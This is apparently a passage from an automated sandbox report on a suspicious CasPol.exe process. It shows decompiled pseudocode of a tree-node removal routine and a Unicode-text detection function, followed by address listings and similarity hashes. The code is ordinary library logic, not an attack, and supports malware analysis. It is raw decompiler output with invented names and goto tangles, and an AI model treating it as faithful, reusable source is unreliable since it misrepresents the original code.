				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}








































                                                                0x0163b095
                                                                0x0163b09b
                                                                0x0163b09f
                                                                0x0163b0a5
                                                                0x0163b0a7
                                                                0x0163b0aa
                                                                0x0163b0ad
                                                                0x0163b0b1
                                                                0x0163b3f8
                                                                0x0163b3fa
                                                                0x0163b3ff
                                                                0x0163b419
                                                                0x0163b41b
                                                                0x0163b41b
                                                                0x0163b401
                                                                0x00000000
                                                                0x0163b0b7
                                                                0x0163b0b9
                                                                0x0163b0bc
                                                                0x0163b0c0
                                                                0x0163b0c2
                                                                0x0163b0c2
                                                                0x0163b0c4
                                                                0x0163b0c8
                                                                0x0163b0cf
                                                                0x0163b0d1
                                                                0x0163b0d1
                                                                0x0163b0da
                                                                0x0163b0dd
                                                                0x0163b0df
                                                                0x0163b0df
                                                                0x0163b0e4
                                                                0x0163b0e9
                                                                0x0163b3e2
                                                                0x0163b3e5
                                                                0x0163b3eb
                                                                0x0168a676
                                                                0x0168a67b
                                                                0x0168a67d
                                                                0x0163b3f1
                                                                0x0163b3f1
                                                                0x0163b3f1
                                                                0x0163b0ef
                                                                0x0163b0ef
                                                                0x0163b0ef
                                                                0x0163b0e9
                                                                0x0163b0f6
                                                                0x0163b28d
                                                                0x0163b28e
                                                                0x0163b293
                                                                0x0163b0fc
                                                                0x0163b0fc
                                                                0x0163b101
                                                                0x0163b104
                                                                0x0163b107
                                                                0x0163b10c
                                                                0x0168a687
                                                                0x0168a68d
                                                                0x0168a68d
                                                                0x0168a687
                                                                0x0163b112
                                                                0x0163b116
                                                                0x0168a696
                                                                0x0168a69c
                                                                0x0168a69c
                                                                0x0168a696
                                                                0x0163b120
                                                                0x0163b121
                                                                0x0163b124
                                                                0x0163b127
                                                                0x0163b12a
                                                                0x0163b12d
                                                                0x0163b132
                                                                0x0168a6a5
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a6ab
                                                                0x00000000
                                                                0x0163b138
                                                                0x0163b138
                                                                0x0163b13a
                                                                0x0163b193
                                                                0x0163b197
                                                                0x0163b19d
                                                                0x0163b29c
                                                                0x0163b29f
                                                                0x0163b2a2
                                                                0x0163b2a7
                                                                0x0168a6d2
                                                                0x0168a6d8
                                                                0x0168a6d8
                                                                0x0168a6d2
                                                                0x0163b2af
                                                                0x0163b420
                                                                0x0163b422
                                                                0x0163b423
                                                                0x00000000
                                                                0x0163b2b5
                                                                0x0163b2b5
                                                                0x0163b2ba
                                                                0x0168a6e1
                                                                0x0168a6e7
                                                                0x0168a6e7
                                                                0x0168a6e1
                                                                0x0163b2c2
                                                                0x00000000
                                                                0x0163b2c8
                                                                0x0163b2cb
                                                                0x0163b2d0
                                                                0x0168a6f0
                                                                0x0168a6f6
                                                                0x0168a6f6
                                                                0x0168a6f0
                                                                0x0163b2d8
                                                                0x00000000
                                                                0x0163b2de
                                                                0x0163b2de
                                                                0x0163b2de
                                                                0x0163b2e1
                                                                0x0163b2e6
                                                                0x0163b2eb
                                                                0x0168a6ff
                                                                0x0168a705
                                                                0x0168a705
                                                                0x0168a6ff
                                                                0x0163b2f3
                                                                0x00000000
                                                                0x0163b2f9
                                                                0x0163b2fb
                                                                0x0163b2fd
                                                                0x0163b301
                                                                0x0163b303
                                                                0x0163b303
                                                                0x0163b308
                                                                0x0163b30b
                                                                0x0163b310
                                                                0x0163b312
                                                                0x0163b312
                                                                0x0163b31c
                                                                0x0163b322
                                                                0x0163b327
                                                                0x0168a70e
                                                                0x0163b335
                                                                0x0163b337
                                                                0x0168a71d
                                                                0x0168a723
                                                                0x0168a723
                                                                0x0168a71d
                                                                0x0163b340
                                                                0x0163b345
                                                                0x0163b349
                                                                0x0168a72a
                                                                0x0168a72a
                                                                0x0163b352
                                                                0x0163b357
                                                                0x0163b359
                                                                0x0163b359
                                                                0x0163b365
                                                                0x0163b367
                                                                0x0163b36c
                                                                0x00000000
                                                                0x0163b36c
                                                                0x0168a714
                                                                0x0168a714
                                                                0x0163b32f
                                                                0x0163b3b8
                                                                0x0163b3bd
                                                                0x0163b3c4
                                                                0x0163b425
                                                                0x0163b427
                                                                0x0163b429
                                                                0x0163b429
                                                                0x0163b427
                                                                0x0163b3c8
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b3ce
                                                                0x0163b42f
                                                                0x0163b3d0
                                                                0x0163b3d0
                                                                0x0163b3d0
                                                                0x0163b3d7
                                                                0x0163b3da
                                                                0x0163b3da
                                                                0x00000000
                                                                0x0163b32f
                                                                0x0163b2f3
                                                                0x0163b2d8
                                                                0x0163b2c2
                                                                0x0163b2af
                                                                0x0163b1a3
                                                                0x0163b1a9
                                                                0x0163b1af
                                                                0x0163b1b2
                                                                0x0163b1b5
                                                                0x0163b1b8
                                                                0x0168a733
                                                                0x0168a739
                                                                0x0168a739
                                                                0x0168a733
                                                                0x0163b1c0
                                                                0x00000000
                                                                0x0163b1c6
                                                                0x0163b1c8
                                                                0x0163b1cb
                                                                0x0163b1ce
                                                                0x0163b1d3
                                                                0x0168a742
                                                                0x0168a748
                                                                0x0168a748
                                                                0x0168a742
                                                                0x0163b1db
                                                                0x00000000
                                                                0x0163b1e1
                                                                0x0163b1e1
                                                                0x0163b1e6
                                                                0x0163b1e9
                                                                0x0163b1ee
                                                                0x0168a751
                                                                0x0163b409
                                                                0x0163b409
                                                                0x0163b40e
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b410
                                                                0x0163b22d
                                                                0x0163b22f
                                                                0x0168a790
                                                                0x0168a796
                                                                0x0168a796
                                                                0x0168a790
                                                                0x0163b23d
                                                                0x0163b243
                                                                0x0163b248
                                                                0x0168a79f
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a7a5
                                                                0x00000000
                                                                0x0163b24e
                                                                0x0163b24e
                                                                0x0163b250
                                                                0x0163b374
                                                                0x0163b379
                                                                0x0163b37e
                                                                0x0168a7ae
                                                                0x0168a7b4
                                                                0x0168a7b4
                                                                0x0168a7ae
                                                                0x0163b386
                                                                0x00000000
                                                                0x0163b38c
                                                                0x0163b38e
                                                                0x0168a7bd
                                                                0x0163b394
                                                                0x0163b394
                                                                0x0163b394
                                                                0x0163b39b
                                                                0x0163b39e
                                                                0x00000000
                                                                0x0163b39e
                                                                0x0163b386
                                                                0x0163b256
                                                                0x0163b258
                                                                0x0168a7c6
                                                                0x0168a7cc
                                                                0x0168a7cc
                                                                0x0168a7c6
                                                                0x0163b261
                                                                0x0163b266
                                                                0x0163b26a
                                                                0x0168a7d3
                                                                0x0168a7d3
                                                                0x0163b273
                                                                0x0163b278
                                                                0x0163b27a
                                                                0x0163b27a
                                                                0x0163b281
                                                                0x0163b283
                                                                0x0163b285
                                                                0x0163b287
                                                                0x0163b289
                                                                0x00000000
                                                                0x0163b289
                                                                0x0163b248
                                                                0x0168a757
                                                                0x0168a757
                                                                0x0163b1f6
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b1fc
                                                                0x0163b201
                                                                0x0168a760
                                                                0x0168a766
                                                                0x0168a766
                                                                0x0168a760
                                                                0x0163b209
                                                                0x0163b3a8
                                                                0x0168a76f
                                                                0x0163b3ae
                                                                0x0163b3ae
                                                                0x0163b3ae
                                                                0x0163b3b0
                                                                0x00000000
                                                                0x0163b20f
                                                                0x0163b20f
                                                                0x0163b213
                                                                0x0168a778
                                                                0x0168a77e
                                                                0x0168a77e
                                                                0x0168a778
                                                                0x0163b21b
                                                                0x00000000
                                                                0x0163b221
                                                                0x0163b223
                                                                0x0168a787
                                                                0x0163b229
                                                                0x0163b229
                                                                0x0163b229
                                                                0x0163b22b
                                                                0x00000000
                                                                0x0163b22b
                                                                0x0163b21b
                                                                0x0163b209
                                                                0x0163b1db
                                                                0x0163b142
                                                                0x0163b142
                                                                0x0163b146
                                                                0x0163b148
                                                                0x0163b14c
                                                                0x0163b14f
                                                                0x0163b154
                                                                0x0163b15b
                                                                0x0168a6b4
                                                                0x00000000
                                                                0x00000000
                                                                0x0168a6ba
                                                                0x0168a6ba
                                                                0x0163b163
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163b163
                                                                0x0163b13a
                                                                0x0163b169
                                                                0x0163b16b
                                                                0x0163b16e
                                                                0x0163b171
                                                                0x0163b175
                                                                0x0163b178
                                                                0x0168a6c3
                                                                0x0168a6c9
                                                                0x0168a6c9
                                                                0x0168a6c3
                                                                0x0163b180
                                                                0x0163b184
                                                                0x00000000
                                                                0x0163b104
                                                                0x0163b0f6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                • Instruction ID: 70dd5c5680df6819c4c0a751508f42bf8cfd4dc825756a3dc412a970522a539a
                                                                • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                                                • Instruction Fuzzy Hash: A2D1E335B143168BEB22CE6DCD8037ABBE1AFC5354B28C269DC65CB346E771D8429750
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01620D20 Relevance: .4, Instructions: 372COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 99%
                                                                			E01620D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1716d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1716920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1716920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x1621174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M01621160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}






































































                                                                0x01620d2b
                                                                0x01620d2e
                                                                0x01620d32
                                                                0x01620d39
                                                                0x01620d3b
                                                                0x01620d3d
                                                                0x01620d3f
                                                                0x01620d46
                                                                0x01620d4d
                                                                0x01620d54
                                                                0x01620d5b
                                                                0x01620d62
                                                                0x01620d69
                                                                0x01620d70
                                                                0x01620d77
                                                                0x01620d7e
                                                                0x01620d85
                                                                0x01620d88
                                                                0x01620d8b
                                                                0x01620d8e
                                                                0x01620d91
                                                                0x01620d94
                                                                0x01620d97
                                                                0x01620d9a
                                                                0x01620d9d
                                                                0x01620da6
                                                                0x016210e9
                                                                0x016210ee
                                                                0x01620db9
                                                                0x01620db9
                                                                0x01620dbc
                                                                0x0167e9c7
                                                                0x0167e9ca
                                                                0x0167e9cd
                                                                0x0167e9d0
                                                                0x0167e9dd
                                                                0x0167e9dd
                                                                0x01620dec
                                                                0x01620dec
                                                                0x01620dee
                                                                0x01620df3
                                                                0x01620ebf
                                                                0x01620ec0
                                                                0x00000000
                                                                0x01620df9
                                                                0x01620df9
                                                                0x01620e1e
                                                                0x01620e21
                                                                0x01620e24
                                                                0x01620e27
                                                                0x01620e2a
                                                                0x01620e2d
                                                                0x01620e30
                                                                0x01620e36
                                                                0x01621040
                                                                0x01621043
                                                                0x01621049
                                                                0x01621049
                                                                0x01620e3c
                                                                0x01620e3f
                                                                0x01621007
                                                                0x0162100a
                                                                0x01621010
